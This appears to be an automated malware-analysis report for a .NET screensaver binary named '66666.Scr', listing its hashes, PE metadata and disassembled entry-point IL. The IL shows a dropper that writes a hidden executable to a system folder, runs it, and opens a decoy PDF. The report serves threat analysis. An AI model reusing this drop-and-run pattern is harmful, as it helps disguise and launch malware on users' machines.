Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 97cfe3e07b5cd73d47bb790f3c76810d
|
| Sha1 | 1669200e12db27f7a2d431b8973a7fc02654ee6f
|
| Sha256 | 67c39f2e56dc93e4b6f16b4658366462f8f90acad03792b2f5c1797bd9f89702
|
| Sha384 | b1983c5bd3dcf19c4f7e3b401577b117bbf25fc01f6bba5d8bd7fbcf2077af696174d2899bb0c584f35e7d357a796c47
|
| Sha512 | b49699f52c7c7622039c07967aef59920432656c67dc483259deab737f8a038e3d782faf287d9f79519e52a03776b302ecb9117536815185a934c99ae05e4a17
|
| SSDeep | 24576:b6/73FKqASI4rltE2A5dIqBcnlKbdsPAcjE2A5dIqBcnlKbdsPAcMYlRDYWY:bsMqPKKqBMlEsPAcgKqBMlEsPAcbRDY
|
| TLSH | C0E56AB0F691C85CF41671319029393987DDB5FBB78424E62C2C6BDD781A901EAB34BB
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | 66666.Scr |
| Full Name | 66666.Scr |
| EntryPoint | System.Void Bound.Open::Main() |
| Scope Name | 66666.Scr |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | 66666 |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 7 |
| Main Method | System.Void Bound.Open::Main() |
| Main IL Instruction Count | 43 |
| Main IL | ldstr files call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.0 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _SlHNqQyRq.exe call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr UCgGutoodh callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _SlHNqQyRq.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr dwWHznIH_E. e.pdf call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr oXwljtfidN callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr dwWHznIH_E. e.pdf call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_00A0: ret stloc.1 <null> ldloc.1 <null> callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) call System.Int32 System.Console::Read() pop <null> leave.s IL_00A0: ret ret <null> |
| Module Name | 66666.Scr |
| Full Name | 66666.Scr |
| EntryPoint | System.Void Bound.Open::Main() |
| Scope Name | 66666.Scr |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | 66666 |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 7 |
| Main Method | System.Void Bound.Open::Main() |
| Main IL Instruction Count | 43 |
| Main IL | ldstr files call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.0 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _SlHNqQyRq.exe call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr UCgGutoodh callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _SlHNqQyRq.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr dwWHznIH_E. e.pdf call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr oXwljtfidN callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr dwWHznIH_E. e.pdf call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_00A0: ret stloc.1 <null> ldloc.1 <null> callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) call System.Int32 System.Console::Read() pop <null> leave.s IL_00A0: ret ret <null> |
| oXwljtfidN | 1.4 |
| oXwljtfidN | D:20220208134112+00'00' |
| oXwljtfidN | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Evernote/10.27.5 Chrome/87.0.4280.141 Electron/11.5.0 Safari/537.36 |
| oXwljtfidN | D:20220208134112+00'00' |
| oXwljtfidN | Skia/PDF m87 |
| oXwljtfidN | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Evernote/10.27.5 Chrome/87.0.4280.141 Electron/11.5.0 Safari/537.36 |
| oXwljtfidN | Skia/PDF m87 |
| oXwljtfidN | D:20220208134112+00'00' |
| oXwljtfidN | D:20220208134112+00'00' |